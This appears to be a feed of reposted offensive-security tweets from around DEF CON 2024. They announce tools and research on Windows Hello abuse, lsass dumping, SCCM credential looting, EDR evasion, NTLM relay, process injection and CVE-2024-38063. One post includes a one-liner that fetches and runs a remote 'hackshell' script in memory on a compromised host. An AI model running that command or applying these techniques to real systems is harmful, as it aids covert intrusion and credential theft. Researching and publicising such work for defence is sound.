😈 [ CCob🏴 @_EthicalChaos_ ]
Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week 🙈
🔗 https://github.com/CCob/Shwmae
🐥 [ tweet ]
Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week 🙈
🔗 https://github.com/CCob/Shwmae
🐥 [ tweet ]
🔥6
😈 [ Orange Tsai 🍊 @orange_8361 ]
Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!
Highlights include:
⚡ Escaping from DocumentRoot to System Root
⚡ Bypassing built-in ACL/Auth with just a '?'
⚡ Turning XSS into RCE with legacy code
🔗 https://blog.orange.tw/2024/08/confusion-attacks-en.html
🐥 [ tweet ]
Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!
Highlights include:
⚡ Escaping from DocumentRoot to System Root
⚡ Bypassing built-in ACL/Auth with just a '?'
⚡ Turning XSS into RCE with legacy code
🔗 https://blog.orange.tw/2024/08/confusion-attacks-en.html
🐥 [ tweet ]
👍8🥱6🔥4🤔1
😈 [ Ricardo Ruiz @RicardoJoseRF ]
Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:
🔗 https://github.com/ricardojoserf/TrickDump
🐥 [ tweet ]
Last week I made public TrickDump, a tool to dump lsass using only NTAPIS without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:
🔗 https://github.com/ricardojoserf/TrickDump
🐥 [ tweet ]
🔥9🥱3
😈 [ OtterHacker @OtterHacker ]
I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!
🔗 https://github.com/OtterHacker/Conferences/tree/main/Defcon32
🐥 [ tweet ]
I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!
🔗 https://github.com/OtterHacker/Conferences/tree/main/Defcon32
🐥 [ tweet ]
🔥7👍2🥱1
😈 [ Bad Sector Labs @badsectorlabs ]
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
🔗 https://github.com/badsectorlabs/sccm-http-looter
🐥 [ tweet ]
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
🔗 https://github.com/badsectorlabs/sccm-http-looter
🐥 [ tweet ]
🔥6
😈 [ klez @KlezVirus ]
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
🔗 https://github.com/klezVirus/DriverJack
🔗 https://github.com/klezVirus/RpcProxyInvoke
🔗 https://github.com/klezVirus/koppeling-p
🐥 [ tweet ]
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
🔗 https://github.com/klezVirus/DriverJack
🔗 https://github.com/klezVirus/RpcProxyInvoke
🔗 https://github.com/klezVirus/koppeling-p
🐥 [ tweet ]
👍7🔥2
😈 [ Dirk-jan @_dirkjan ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
🔗 https://dirkjanm.io/talks/
PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
🐥 [ tweet ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
🔗 https://dirkjanm.io/talks/
PoC:
🔗 https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
🐥 [ tweet ]
🔥3
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
RELEASE:
This should be the 1st command you execute on a remote shell 🧨
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
🔗 https://github.com/hackerschoice/hackshell
🐥 [ tweet ]
RELEASE:
This should be the 1st command you execute on a remote shell 🧨
source <(curl -SsfL https://thc.org/hs)
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
🔗 https://github.com/hackerschoice/hackshell
🐥 [ tweet ]
👍15🔥4
Offensive Xwitter
😈 [ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. 🐥 [ tweet ][ quote ]
😈 [ Yarden Shafir @yarden_shafir ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
🐥 [ tweet ][ quote ]
Another method that still works on most EDRs is HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
🐥 [ tweet ][ quote ]
👍13
😈 [ Dazzy @dazzyddos ]
Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.
🔗 https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49
🐥 [ tweet ]
Wrote a blog post on abusing exclusions to evade AVs/EDR which is stealthy, effective and an often overlooked topic.
🔗 https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49
🐥 [ tweet ]
😢4🔥2
😈 [ Logan Goins @shellph1sh ]
Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)
🔗 https://logan-goins.com/2024-07-23-ldap-relay/
🐥 [ tweet ]
Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)
🔗 https://logan-goins.com/2024-07-23-ldap-relay/
🐥 [ tweet ]
🔥6🥱4👍1
😈 [ wei @XiaoWei___ ]
MSRC fixed a RCE bug in TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.
🐥 [ tweet ]
MSRC fixed a RCE bug in TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.
🐥 [ tweet ]
🤯12🔥3👍2
😈 [ Synacktiv @Synacktiv ]
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
🔗 https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
🐥 [ tweet ]
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
🔗 https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
🐥 [ tweet ]
🥱6👍4
😈 [ Tetsuo @7etsuo ]
Added templates for 24 process injection techniques to my Windows API Cheatsheet.
Code Injection Techniques
0. Process Enumeration Code
1. DLL Injection
2. PE Injection
3. Reflective Injection
4. APC Injection
5. Process Hollowing (Process Replacement)
6. AtomBombing
7. Process Doppelgänging
8. Process Herpaderping
9. Hooking Injection
10. Extra Windows Memory Injection
11. Propagate Injection
12. Heap Spray
13. Thread Execution Hijacking
14. Module Stomping
15. IAT Hooking
16. Inline Hooking
17. Debugger Injection
18. COM Hijacking
19. Phantom DLL Hollowing
20. PROPagate
21. Early Bird Injection
22. Shim-based Injection
23. Mapping Injection
24. KnownDlls Cache Poisoning
🔗 https://github.com/7etsuo/windows-api-function-cheatsheets
🐥 [ tweet ]
Added templates for 24 process injection techniques to my Windows API Cheatsheet.
Code Injection Techniques
0. Process Enumeration Code
1. DLL Injection
2. PE Injection
3. Reflective Injection
4. APC Injection
5. Process Hollowing (Process Replacement)
6. AtomBombing
7. Process Doppelgänging
8. Process Herpaderping
9. Hooking Injection
10. Extra Windows Memory Injection
11. Propagate Injection
12. Heap Spray
13. Thread Execution Hijacking
14. Module Stomping
15. IAT Hooking
16. Inline Hooking
17. Debugger Injection
18. COM Hijacking
19. Phantom DLL Hollowing
20. PROPagate
21. Early Bird Injection
22. Shim-based Injection
23. Mapping Injection
24. KnownDlls Cache Poisoning
🔗 https://github.com/7etsuo/windows-api-function-cheatsheets
🐥 [ tweet ]
👍10🔥4🥱3🍌2😢1
😈 [ Emeric Nasi @EmericNasi ]
Hi, I talked about advanced initial access in June at OffensiveX in Athens.
Slides are here:
🔗 https://github.com/sevagas/Advanced_Initial_access_in_2024_OffensiveX/blob/main/breach_the_gates_extended.pdf
For those who ask: I still don't know when the recorded talk will be published
🐥 [ tweet ]
Hi, I talked about advanced initial access in June at OffensiveX in Athens.
Slides are here:
🔗 https://github.com/sevagas/Advanced_Initial_access_in_2024_OffensiveX/blob/main/breach_the_gates_extended.pdf
For those who ask: I still don't know when the recorded talk will be published
🐥 [ tweet ]
👍9🥱2
😈 [ Will @BushidoToken ]
I am happy to share a new resource I recently created called The Ransomware Tool Matrix:
🔗 https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
🔗 https://github.com/BushidoUK/Ransomware-Tool-Matrix
🐥 [ tweet ]
I am happy to share a new resource I recently created called The Ransomware Tool Matrix:
🔗 https://blog.bushidotoken.net/2024/08/the-ransomware-tool-matrix.html
🔗 https://github.com/BushidoUK/Ransomware-Tool-Matrix
🐥 [ tweet ]
🔥11👍1
Offensive Xwitter
😈 [ wei @XiaoWei___ ] MSRC fixed a RCE bug in TCPIP module. I found the bug several months ago. Its score is 9.8 and exploitation is more likely. Please apply the patch immediately. 🐥 [ tweet ]
😈 [ Robel Campbell @RobelCampbell ]
Regarding CVE-2024-38063 IPV6 RCE in Windows...
After reading RFCs about optional headers in IPv6 packets, I managed to create POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow creates a large value used in a loop which eventually write data out of bounds and causes a crash.
I imagine this can be weaponized using heap massaging techniques and corrupting adjacent objects in the heap.
As many have already stated before, this can easily be mitigated by applying the latest patches or disabling IPv6 (which is enabled by default).
🐥 [ tweet ]
Regarding CVE-2024-38063 IPV6 RCE in Windows...
After reading RFCs about optional headers in IPv6 packets, I managed to create POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow creates a large value used in a loop which eventually write data out of bounds and causes a crash.
I imagine this can be weaponized using heap massaging techniques and corrupting adjacent objects in the heap.
As many have already stated before, this can easily be mitigated by applying the latest patches or disabling IPv6 (which is enabled by default).
🐥 [ tweet ]
👍9🍌1
Offensive Xwitter
😈 [ Robel Campbell @RobelCampbell ] Regarding CVE-2024-38063 IPV6 RCE in Windows... After reading RFCs about optional headers in IPv6 packets, I managed to create POC to cause a crash. The bug check in this case isn't too detailed, but essentially the underflow…
😈 [ farmpoet @f4rmpoet ]
It's time to take a closer look at CVE-2024-38063 (Windows TCPIP RCE).
I usually don't post partial analysis but since most available info is unreliable I'll do my best to try and shed some light.
This time I'll focus on my workflow and thought process as we go 🧵
🔗 https://threadreaderapp.com/thread/1825472703223992323.html
🐥 [ tweet ]
It's time to take a closer look at CVE-2024-38063 (Windows TCPIP RCE).
I usually don't post partial analysis but since most available info is unreliable I'll do my best to try and shed some light.
This time I'll focus on my workflow and thought process as we go 🧵
🔗 https://threadreaderapp.com/thread/1825472703223992323.html
🐥 [ tweet ]